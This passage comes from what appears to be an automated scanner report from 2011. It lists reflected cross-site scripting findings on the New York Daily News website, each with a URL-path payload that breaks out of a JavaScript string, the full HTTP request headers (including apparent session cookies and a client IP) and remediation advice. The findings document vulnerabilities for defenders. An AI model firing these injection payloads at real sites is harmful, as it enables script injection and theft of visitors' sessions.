This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/02/084e6aa'%3balert(1)//794c4c0d2b8/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:17 GMT
Server: Apache
Keep-Alive: timeout=3, max=992
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d28f'%3balert(1)//8c2f8be01db was submitted in the REST URL parameter 6. This input was echoed as 6d28f';alert(1)//8c2f8be01db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html6d28f'%3balert(1)//8c2f8be01db HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 17:26:18 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 70312
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec2bb'%3b452488c4958 was submitted in the REST URL parameter 1. This input was echoed as ec2bb';452488c4958 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localec2bb'%3b452488c4958/bronx/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:44 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70077
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467c5'%3b925ee5a2258 was submitted in the REST URL parameter 2. This input was echoed as 467c5';925ee5a2258 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx467c5'%3b925ee5a2258/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:09 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70077
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bafa'%3balert(1)//a64152033dd was submitted in the REST URL parameter 1. This input was echoed as 6bafa';alert(1)//a64152033dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6bafa'%3balert(1)//a64152033dd/bronx/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e81be'%3balert(1)//d4dbb920a8d was submitted in the REST URL parameter 2. This input was echoed as e81be';alert(1)//d4dbb920a8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronxe81be'%3balert(1)//d4dbb920a8d/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:15 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 298f5'%3balert(1)//89d2b5d0d9 was submitted in the REST URL parameter 3. This input was echoed as 298f5';alert(1)//89d2b5d0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011298f5'%3balert(1)//89d2b5d0d9/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:50 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70159
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7319'%3balert(1)//86b12d25376 was submitted in the REST URL parameter 4. This input was echoed as c7319';alert(1)//86b12d25376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02c7319'%3balert(1)//86b12d25376/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:39:10 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82a7'%3balert(1)//f6299d7f642 was submitted in the REST URL parameter 5. This input was echoed as c82a7';alert(1)//f6299d7f642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/06c82a7'%3balert(1)//f6299d7f642/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:07 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c546'%3balert(1)//059a94aed66 was submitted in the REST URL parameter 6. This input was echoed as 6c546';alert(1)//059a94aed66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/06/2011-02-06_crushed_to_death_car_falls_on_him_in_bizarre_bx_accident.html6c546'%3balert(1)//059a94aed66 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:02 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70160
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73d92'%3balert(1)//64177312ae7 was submitted in the REST URL parameter 1. This input was echoed as 73d92';alert(1)//64177312ae7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local73d92'%3balert(1)//64177312ae7/bronx/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:58 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb2a'%3balert(1)//6cde04187b4 was submitted in the REST URL parameter 2. This input was echoed as eeb2a';alert(1)//6cde04187b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronxeeb2a'%3balert(1)//6cde04187b4/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:20 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d4e'%3balert(1)//7da93c3de9d was submitted in the REST URL parameter 3. This input was echoed as 53d4e';alert(1)//7da93c3de9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/201153d4e'%3balert(1)//7da93c3de9d/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:38:10 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ce91'%3balert(1)//090f96c187c was submitted in the REST URL parameter 4. This input was echoed as 1ce91';alert(1)//090f96c187c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/021ce91'%3balert(1)//090f96c187c/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
